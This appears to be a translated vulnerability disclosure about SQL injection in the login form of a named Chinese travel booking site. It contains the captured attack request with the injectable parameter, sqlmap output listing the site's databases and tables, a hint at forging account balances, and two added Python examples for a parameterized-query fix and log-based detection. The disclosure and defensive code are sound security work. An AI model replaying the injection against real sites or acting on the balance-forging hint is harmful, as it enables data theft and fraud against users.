2015-08-05: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed.
2015-09-19: The vendor has chosen to ignore the vulnerability; details disclosed to the public.
This domain name is a bit hardcore!
While scanning a C-class range belonging to Ctrip I found this site. The login page has a POST injection; I captured the request and ran it: 50 databases, the current database holds several hundred thousand users' records, and balances for withdrawal can even be forged.
POST /Account/Login?ReturnUrl=%2FHotelnew%2FOrder%3FcheckInDate%3D2015-08-05%26checkOutDate%3D2015-08-06%26hotelID%3DE00101025%26roomtypeId%3D1026%26rpId%3D1012861%26ppid%3D134128186 HTTP/1.1
Host: www.feijipiao.cn
Content-Length: 25
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.feijipiao.cn
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://www.feijipiao.cn/Account/Login?ReturnUrl=%2fHotelnew%2fOrder%3fcheckInDate%3d2015-08-05%26checkOutDate%3d2015-08-06%26hotelID%3dE00101025%26roomtypeId%3d1026%26rpId%3d1012861%26ppid%3d134128186&checkInDate=2015-08-05&checkOutDate=2015-08-06&hotelID=E00101025&roomtypeId=1026&rpId=1012861&ppid=134128186
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: pgv_pvi=9340930048; pgv_si=s543827968; bdshare_firstime=1438672541258; travelCity=cityid=0101&cityname=%e5%8c%97%e4%ba%ac; QN163=0; 4000747888mid=987_24; 4000747888msg=%u60A8%u597D%uFF0C%u8BF7%u95EE%u6709%u4EC0%u4E48%u53EF%u4EE5%u5E2E%u5230%u60A8%uFF1F%u8BF7%u63A5%u53D7%u804A%u5929%u9080%u8BF7%u3002; 4000747888mh=1438672681002; 4000747888slid=slid_983_27%7C; 4000747888slid_983_27=1438672681019; his_hotel=[{"hotelName":"????o????é?????é??é???o?","hotelId":"E00101025","price":410}]; CNZZDATA1000181042=617491300-1438667942-%7C1438667942

ClientName=aaa%27&PWD=aaa
The captured request
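The injection in the request above exists because the submitted ClientName is spliced into the SQL text on the server. The following Python is an added example, not code from the original report or from the site's own ASP.NET application: it uses sqlite3 as a stand-in for the SQL Server backend the scan identified, the BOUser table name comes from the report but its columns and the sample accounts are constructed, and it puts the vulnerable concatenation pattern beside the parameterized form. The page's `aaa'` input is a database error in the first (what a scanner sees as an HTTP 500) and simply a failed login in the second.

```python
import hashlib
import hmac
import os
import sqlite3

# Added example (not the site's code). sqlite3 stands in for the SQL Server
# backend reported on the page; BOUser is the table the report names, but its
# columns and the sample accounts below are constructed for this demo.


def _hash(pwd: str, salt: bytes) -> bytes:
    # Passwords are hashed, so the SQL only ever carries the user name.
    return hashlib.pbkdf2_hmac("sha256", pwd.encode("utf-8"), salt, 100_000)


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE BOUser (ClientName TEXT PRIMARY KEY, Salt BLOB, PwdHash BLOB)"
    )
    for name, pwd in (("alice", "correct horse"), ("bob", "battery staple")):
        salt = os.urandom(16)
        conn.execute("INSERT INTO BOUser VALUES (?, ?, ?)", (name, salt, _hash(pwd, salt)))
    conn.commit()
    return conn


def login_concat(conn: sqlite3.Connection, client_name: str, pwd: str) -> bool:
    # VULNERABLE pattern: the submitted name is spliced into the SQL text, so a
    # quote character alters the statement instead of being treated as data.
    sql = f"SELECT Salt, PwdHash FROM BOUser WHERE ClientName = '{client_name}'"
    row = conn.execute(sql).fetchone()
    return row is not None and hmac.compare_digest(_hash(pwd, row[0]), row[1])


def login_param(conn: sqlite3.Connection, client_name: str, pwd: str) -> bool:
    # HARDENED form: the name travels as a bound parameter and never becomes SQL.
    sql = "SELECT Salt, PwdHash FROM BOUser WHERE ClientName = ?"
    row = conn.execute(sql, (client_name,)).fetchone()
    return row is not None and hmac.compare_digest(_hash(pwd, row[0]), row[1])


def outcome(login, conn: sqlite3.Connection, client_name: str, pwd: str) -> str:
    """Map a login attempt to what the web tier would emit: 'ok', 'denied', or
    'db_error' (the last is what surfaces as an HTTP 500 to a scanner)."""
    try:
        return "ok" if login(conn, client_name, pwd) else "denied"
    except sqlite3.DatabaseError:
        return "db_error"


if __name__ == "__main__":
    db = make_db()
    # Second pair is the exact ClientName/PWD the captured request carried.
    for name, pwd in (("alice", "correct horse"), ("aaa'", "aaa")):
        print(f"{name!r:8} concat={outcome(login_concat, db, name, pwd):9} "
              f"param={outcome(login_param, db, name, pwd)}")
```

Binding parameters is the fix; the hashed-password layout is there only so the demo does not put a second attacker-controlled string into the query, and the same parameter binding applies to every other field the page's request carries.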
[15:36:51] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2012
[15:36:51] [INFO] fetching database names
[15:36:51] [WARNING] reflective value(s) found and filtering out
[15:36:51] [INFO] the SQL query used returns 48 entries
available databases [48]:
[*] CANFeiYouShangWu
[*] CANJinTian
[*] CANJTDZB
[*] CANMoLing
[*] CANSengLan
[*] CANTianTai
[*] CANTianYiLou
[*] CANTianYun
[*] CANXingTu
[*] CANXinZhuLiu
[*] CANYuLiang
[*] CANYunShangFei
[*] CSXChunShi
[*] CSXCuoFengCY
[*] CSXFuHang
[*] CSXJinFei
[*] CSXKaiWei
[*] CSXLeFei
[*] CSXLongXing
[*] CSXTianYuSW
[*] CSXTongYun
[*] CSXWoYaoFei
[*] CSXXingShaPiaoWu
[*] CSXXinJiYuan
[*] CSXYiTong
[*] CSXYuLiang
[*] CSXZeTuo
[*] DataService
[*] FJPDB
[*] HGHWanTu
[*] HGHZhuJiFeiKuai
[*] master
[*] model
[*] msdb
[*] NNGXinRui
[*] OADB
[*] PEK360ShangLv
[*] PEKBaiWei
[*] PEKFeiYingZhanChi
[*] PEKJieLan
[*] PEKJinLongShenShi
[*] PEKJunPeng
[*] PEKWanYou
[*] PEKYiChuXing
[*] PEKYiFeiChangXing
[*] SHAShunxingTianXia
[*] TAOPengFei
[*] tempdb
[15:36:52] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[15:36:52] [INFO] fetched data logged to text files under 'C:\Users\k\.sqlmap\output\www.feijipiao.cn'
50 databases... I was stunned.
Database: FJPDB
[264 tables]
+----------------------------------+
| APIManager |
| APIManagerLog |
| APIOperLog |
| Account |
| ActivityLottery |
| Agent |
| AirCo |
| AirPort |
| BAArea |
| BAChng |
| BADistance |
| BAPlaneInfo |
| BAPrice |
| BAPriceBak |
| BAPriceNO |
| BCInfo_Temp |
| BCScheduling_Temp |
| BCSwingCardTemp_Temp |
| BDBank |
| BDBankCreditCard |
| BDBankOffLine |
| BDDic |
| BDPayPlatParam |
| BOLog |
| BOPage |
| BORole |
| BOUser |
| BankStatement |
| CabinGW |
| Client |
| ClientB2B |
| ClientB2BAccount |
| ClientB2BAirCoAcct |
| ClientB2BBill |
| ClientB2BContact |
| ClientB2BLog |
| ClientB2BTranRec |
| ClientB2BUser |
| ClientB2BZChng |
| ClientCashLog |
| ClientCashTake |
| ClientFeedback |
| ClientJiFenLog |
| ClientLevel |
| ClientLoginLog |
| ClientPsgr |
| ClientRefund |
| CommonDiscount |
| CommonPassenger |
| Contract |
| Coupon |
| CouponType |
| Customer |
| FinMatch |
| FinMatchSwitch |
| FinSell |
| FinTradeDetail |
| FlightQuery |
| FlightQueryAndT |
| FlightQueryF |
| FlightQueryT |
| FlightTaxAirFree |
| FlightTemp |
| FriendLink |
| GiftSerial |
| GiftSerialChk |
| Help |
| HotelAddPriceDetail |
| HotelBrand |
| HotelCancelRule |
| HotelChangePrice |
| HotelCommissionRule |
| HotelCommissionRuleDetail |
| HotelDetail |
| HotelDetailNew |
| HotelGarantee |
| HotelImage |
| HotelImageNew |
| HotelInfo |
| HotelInfoNew |
| HotelInfoReplenish |
| HotelJLCity |
| HotelJLState |
| HotelLocation |
| HotelLocationNewID |
| HotelLog |
| HotelMail |
| HotelNear |
| HotelNearNew |
| HotelOnlinePayment |
| HotelOrder |
| HotelOrderCreditCard |
| HotelOrderGuest |
| HotelOrderProcessLog |
| HotelOrderRate |
| HotelPrePayBase |
| HotelPromotion |
| HotelQunar |
| HotelQunarCityInfo |
| HotelQunarOrder |
| HotelQunarRoom |
| HotelRateTypeInfo |
| HotelRelation |
| HotelRoom |
| HotelRoomNew |
| HotelRoomPriceDetail |
| HotelRoomPriceDetailH |
| HotelRoomPriceQueue |
| HotelRoomRate |
| HotelRoomRateNew |
| HotelSearchProcess |
| HotelSelfId |
| HotelUserComment |
| HotelUserCommentSummary |
| InsureWaitIssue |
| JPAirCoRebateRateSet |
| JPInsureProfit |
| MarketingLog |
| MarketingUser |
| MarketingUserDetail |
| News |
| NewsComment |
| NewsType |
| Notepad |
| Notes |
| NotesType |
| NotesViewer |
| OTA |
| OrderAir |
| OrderAirBuyerTTSTask |
| OrderAirCoTktInfoPN |
| OrderAirComment |
| OrderAirF |
| OrderAirF_V |
| OrderAirGJQL |
| OrderAirH |
| OrderAirIDX |
| OrderAirLog |
| OrderAirOld |
| OrderAirOutTktTaskDFT |
| OrderAirPriceChng |
| OrderAirT |
| OrderAirTAPPClient |
| OrderAirTBTktCallBack |
| OrderAirTChange |
| OrderAirTChng |
| OrderAirTRefund |
| OrderAirTRefundRule |
| OrderAirTTSNotify |
| OrderAirTWrong |
| OrderAirTimeLimit |
| OrderAirV |
| OrderList517 |
| OrderLowerCabin |
| OrderSameCabin |
| OrderTicketUseStatTask |
| Organization |
| PIDInfo |
| PIDInstructionHis |
| PIDUserHis |
| PassengerInfo |
| PayDetach |
| PayTask |
| PayTicketNoBack |
| PkgAssociate |
| PkgAttractions |
| PkgOrder |
| PkgPicture |
| PkgProductInfo |
| PkgScenicInfo |
| Policy |
| PolicyActivityGW |
| PolicyActivityGWLog |
| PolicyCheckPoint |
| PolicyCheckPointLog |
| PolicyDSV |
| PolicyLog |
| PolicyOperLog |
| Problem |
| ProblemReply |
| ProfitAdj |
| QTInfo |
| QTInfo_Bak |
| QtInfoHis |
| RTXNotify |
| ReceiptCost |
| ReceiptCostDetail |
| ReportTrend |
| ReportTrendData |
| SMSReceive |
| SMSSendWait |
| SMSSended |
| SMSTask |
| SMSTemplet |
| SMSTempletF |
| SYSIPAttack |
| SYSLog |
| SYSParam |
| SmsTaskResult |
| SmsTaskWait |
| SolarData |
| SpecialDiscount |
| SystemLog |
| TaoBaoAirLine |
| TaoBaoAirLog |
| TaoBaoAirPrice |
| TicketOrder |
| TicketPlatform |
| TicketProduct |
| TicketProductPrice_AI |
| TicketProduct_AI |
| TicketProduct_BL |
| TicketProduct_JU |
| TicketProduct_QN |
| TicketQunarOrder |
| TicketQunarOrderPay |
| TicketQunarOrderPerson |
| TicketRefund |
| TicketResource_BL |
| TktAirRec |
| TktAirRecPNRInfo |
| TrainAccount |
| TrainOrder |
| TrainOrderH |
| TrainOrderLog |
| TrainOrderPsgr |
| TrainOrderV |
| TrainSourceManage |
| TrainVerify |
| TrainVerifyH |
| TrainVerifyPsgr |
| TrainVerifyPsgrH |
| TrainVersionInfo |
| TravelAD |
| TravelActivityDate |
| TravelApiProcess |
| TravelBranch |
| TravelDates |
| TravelHotLocation |
| TravelHotelInfo |
| TravelLineLog |
| TravelNavigationBar |
| TravelNearCity |
| TravelOrderCreditCard |
| TravelOrderLog |
| TravelPromotion |
| TravelSearchKeyWord |
| TravelSeasonPopular |
| TravelTrafficInfo |
| TravelTui |
| TsqlLog |
| UserCollection |
| UserReviews |
| _FinTradeDetail20150313 |
| _HotelInfonewUpd0603 |
| _HuoChePiaoIDNo |
| _OrderAirT201501091140afterdate8 |
| _OrderAirTChng201501081625 |
| _OrderAirTChng20150121 |
| airport1 |
| pidtemp |
| trace_profiler |
| v_BCInfo |
| v_BCUserSet |
+----------------------------------+
[15:36:12] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 267 times
[15:36:12] [INFO] fetched data logged to text files under 'C:\Users\k\.sqlmap\output\www.feijipiao.cn'
[*] shutting down at 15:36:12
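The sqlmap run above left a footprint the site could have noticed: 267 HTTP 500 responses in under a minute, all on the login endpoint, from one client. The following Python is an added example, not code from the report, that parses constructed IIS W3C log lines (the field order, addresses and timestamps are assumptions, not real logs from this site) and flags any client that produced at least a threshold number of 500s on the login path inside a short sliding window. A real deployment would feed it the server's own logs, but the logic is the same.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Optional

# Added example (not the report's code). The field list is an assumed IIS W3C
# layout; sample addresses and timestamps below are constructed.
FIELDS = ["date", "time", "s-ip", "cs-method", "cs-uri-stem", "cs-uri-query",
          "s-port", "cs-username", "c-ip", "cs(User-Agent)", "cs(Referer)",
          "sc-status", "sc-substatus", "sc-win32-status", "time-taken"]


def parse_iis_line(line: str) -> Optional[dict]:
    """Split one W3C log line into a dict keyed by FIELDS; None if malformed."""
    parts = line.split(" ")
    if len(parts) != len(FIELDS):
        return None
    rec = dict(zip(FIELDS, parts))
    rec["ts"] = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
    return rec


def find_error_bursts(lines: List[str], path: str = "/Account/Login",
                      status: str = "500", threshold: int = 20,
                      window: timedelta = timedelta(minutes=5)) -> Dict[str, int]:
    """Return {client_ip: peak_count} for clients whose 500s on `path` reach
    `threshold` within any `window`-long span. A single 500 (a user who typed
    a quote in their name) never trips it; a scanner's run does."""
    per_client = defaultdict(list)
    for line in lines:
        if line.startswith("#"):          # skip W3C directive lines
            continue
        rec = parse_iis_line(line)
        if rec and rec["cs-uri-stem"].lower() == path.lower() and rec["sc-status"] == status:
            per_client[rec["c-ip"]].append(rec["ts"])

    alerts: Dict[str, int] = {}
    for ip, stamps in per_client.items():
        stamps.sort()
        lo, peak = 0, 0
        for hi in range(len(stamps)):      # sliding window over sorted times
            while stamps[hi] - stamps[lo] > window:
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak >= threshold:
            alerts[ip] = peak
    return alerts


def sample_log() -> List[str]:
    """Constructed log: two ordinary clients and one that hammers the login
    page with requests the database rejects (status 500), 2 seconds apart."""
    base = datetime(2015, 8, 5, 15, 36, 0)
    ua = "Mozilla/5.0+(Windows+NT+6.3;+WOW64)"   # IIS writes spaces as '+'

    def line(ts: datetime, ip: str, status: str, stem: str = "/Account/Login") -> str:
        return " ".join([ts.strftime("%Y-%m-%d"), ts.strftime("%H:%M:%S"), "10.0.0.5",
                         "POST", stem, "ReturnUrl=%2FHotelnew%2FOrder", "80", "-",
                         ip, ua, "-", status, "0", "0", "120"])

    lines = ["#Fields: " + " ".join(FIELDS),
             line(base, "198.51.100.23", "302"),                         # normal login
             line(base + timedelta(seconds=40), "198.51.100.42", "500")]  # one-off error
    lines += [line(base + timedelta(seconds=2 * i), "203.0.113.7", "500") for i in range(25)]
    return lines


if __name__ == "__main__":
    for ip, count in find_error_bursts(sample_log()).items():
        print(f"ALERT {ip}: {count} HTTP 500s on /Account/Login within 5 minutes")
```

The threshold and window are the tunable parts; the more durable fix is the parameterized query, after which the probes return ordinary failed logins rather than 500s, and this rule then catches only the rate, not the error.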
Contents of the current database; BOUser holds the USER data.
Dumped a few users at random... as proof.
Here an SQL statement could be added to increase the balance, or dig out a user who has a balance, and then....
Unable to reach the vendor, or the vendor actively declined.
Vulnerability Rank: 15 (WooYun rating)